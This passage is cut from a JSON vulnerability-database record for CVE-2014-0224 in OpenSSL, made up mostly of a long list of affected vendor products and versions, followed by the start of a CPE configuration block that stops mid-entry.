}, { "model": "ecns600 v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos 13.2r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "horizon view client", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "proxysgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.4.6.1" }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.21" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "0.8.11" }, { "model": "oceanstor s2600t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-471" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "color laserjet enterprise cp4025 cc490a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.164.1" }, { "model": "communicator for android", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.9" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v29.7" }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.3" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.9.131.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3" }, { "model": "laserjet printer series q3723a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9040/90508.260.3" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.06" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "3par service processor sp-4.3.0.ga-17.p000", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "color laserjet cp6015 q3935a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.203.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.27" }, { "model": "sbr carrier 7.5.0-r11", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "laserjet enterprise m603 series ce994a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6000" }, { "model": "junos 12.2r7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "ave2000 v100r001c00sph001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.1.3" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.19" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.21" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.4" }, { "model": "laserjet enterprise m4555 mfp ce504a 2302963 436064", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "junos 10.4r7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.60" }, { "model": "digital sender 9200c q5916a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9.271.3" }, { "model": "laserjet m3035 multifunction printer cc477a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "48.306.1" }, { "model": "system x3620m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "73761.42" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3600v20" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "tivoli netcool/system service monitor fp5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.2" }, { "model": "laserjet p3005 printer series q7812a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "2.190.3" }, { "model": "documentum content server sp2 p15", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "laserjet enterprise color flow mfp m575c cd646a 2302963 436081", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.55" }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "9.2-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.90" }, { "model": "laserjet p4515 cb514a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.203.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.16" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "2.0.3" }, { "model": "10.0-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.13" }, { "model": "msr4000 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "system x3400m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "78371.42" }, { "model": "junos 12.2r8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.21" }, { "model": "laserjet p4014 cb506a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.213.1" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "laserjet enterprise mfp m525f cf116a 2302963 436069", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "500" }, { "model": "puremessage for unix", "scope": "eq", "trust": 0.3, "vendor": "sophos", "version": "5.5.4" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463012.5" }, { "model": "financial services lending and leasing", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "14.1" }, { "model": "flex system p24l compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vpn client v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "metro ethernet series access devices", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "12000" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "email security gateway", "scope": "eq", "trust": 0.3, "vendor": "websense", "version": "7.8.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "eucalyptus", "scope": "eq", "trust": 0.3, "vendor": "eucalyptus", "version": "3.4.2" }, { "model": "3par service processor sp-4.1.0.ga-97.p011", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.25" }, { "model": "3par service processor sp-4.1.0.ga-97.p010", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.20" }, { "model": "cloudsystem foundation", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "8.1" }, { "model": "database and middleware automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.01" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.30" }, { "model": "jetdirect 635n eio card j7961g", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "41.16" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.84" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "vdi-in-a-box", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.4.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.3" }, { "model": "junos 13.3r2-s3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.36" }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "color laserjet multifunction printer series q7517a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "400046.380.3" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "ace application control engine appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "flex system p460", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-42x)0" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "junos pulse for ios", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "stunnel", "scope": "eq", "trust": 0.3, "vendor": "stunnel", "version": "5.01" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.18" }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.05" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.2" }, { "model": "tivoli network manager ip edition fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.94" }, { "model": "laserjet enterprise mfp m630 series b3g86a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "project openssl 1.0.0m", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.8" }, { "model": "dsr-500n rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "color laserjet m651 cz257a 2302963 436073", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "security network intrusion prevention system gx5008-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.21" }, { "model": "color laserjet cm6040 multifunction printer q3938a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "52.256.1" }, { "model": "netiq sslvpn server", "scope": "eq", "trust": 0.3, "vendor": "novell", "version": "0" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.45" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.4" }, { "model": "ios xr software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.77" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413011.5" }, { "model": "color laserjet cp4005 printer series cb503a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "46.230.6" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.18" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.75" }, { "model": "sparc m10-1", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "nip2000\u00265000 v100r002c10spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.5" }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "laserjet enterprise m603 series ce995a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6000" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.44" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.8.0" }, { "model": "laserjet enterprise mfp m630 series j7x28a 2303714 233000041", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.166" }, { "model": "junos 11.4r3.7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "eupp v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.0.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "junos 13.1r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.52" }, { "model": "dsr-500 rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "dgs-1500.20", "scope": "eq", "trust": 0.3, "vendor": "d link", "version": "2.51.005" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "laserjet enterprise m602 series ce992a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6000" }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "junos d15", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x45-" }, { "model": "update manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "laserjet p2055 printer series ce457a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "20141201" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.5" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "idol image server", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.87" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.35" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087520" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.27" }, { "model": "oceanstor s5800t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.36" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.47" }, { "model": "itbm standard", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.0.1" }, { "model": "fortigate", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.0.8" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "mcp", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "66000" }, { "model": "color laserjet flow m680 cz250a 2302963 436072", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.32" }, { "model": "unified series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69000" }, { "model": "tivoli netcool/system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.6" }, { "model": "host checker", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "junos 12.2r8-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.21-20" }, { "model": "oceanstor s5600t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.38" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.11" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3.1" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "1.0.6" }, { "model": "system x3400m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "73791.42" }, { "model": "laserjet enterprise color m551 series cf083a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5000" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "winscp", "scope": "eq", "trust": 0.3, "vendor": "winscp", "version": "5.1.6" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.2" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.35" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.97" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.34" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.22" }, { "model": "malware analyzer g2", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.1" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "snapdrive for unix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "client applications", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "4.0.14" }, { "model": "laserjet enterprise color mfp m880 d7p71a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8000" }, { "model": "security module for cisco network registar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "color laserjet cp3525 cc470a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "6.183.1" }, { "model": "sbr carrier", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.11" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "rc1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "laserjet p4014 cb512a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.213.1" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.145" }, { "model": "project openssl 0.9.8za", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "cloudplatform", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "4.3.0.1" }, { "model": "data ontap storage management initiative specification a", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0" }, { "model": "aura application server sip core pb16", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.9" }, { "model": "idp series 5.1r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "s6900 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.00" }, { "model": "cloudplatform", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "4.2.1" }, { "model": "puremessage for unix", "scope": "eq", "trust": 0.3, "vendor": "sophos", "version": "5.5.5" }, { "model": "proventia network security controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "netscaler", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "10.1-122.17" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.5" }, { "model": "fortimail build", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.0.6170" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "1.9.4" }, { "model": "junos 10.4r10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "clearpass", "scope": "eq", "trust": 0.3, "vendor": "arubanetworks", "version": "6.3.2" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.30" }, { "model": "vfabric web server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.3.4" }, { "model": "dsm v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "communications policy management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.4.1" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "laserjet enterprise m712 series cf238a 2302963 436080", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "700" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "css series content services switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "115000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "tivoli workload scheduler distributed fp04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "unified agent", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1" }, { "model": "oceanstor s5800t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.35" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "enterprise linux desktop workstation client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.10" }, { "model": "web gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.10" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.05" }, { "model": "security network intrusion prevention system gx7412-05", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "icewall mcrp", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.7" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.33" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "0.9.5" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "web security gateway anywhere", "scope": "eq", "trust": 0.3, "vendor": "websense", "version": "7.8.3" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "junos space 13.3r1.9", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "laserjet p4515 cb517a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.213.1" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "s7700\u0026s9700 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "9.3-beta1", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "software foundation python", "scope": "eq", "trust": 0.3, "vendor": "python", "version": "2.7" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.98" }, { "model": "laserjet enterprise color mfp m880 a2w75a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8000" }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.1" }, { "model": "horizon workspace server gateway", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.5" }, { "model": "laserjet enterprise p3015 ce595a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.186.1" }, { "model": "espace usm v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.1" } ], "sources": [ { "db": "BID", "id": "67899" }, { "db": "CNNVD", "id": "CNNVD-201406-080" }, { "db": "NVD", "id": "CVE-2014-0224" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.0.0m", "versionStartIncluding": "1.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.0.1h", "versionStartIncluding": "1.0.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": 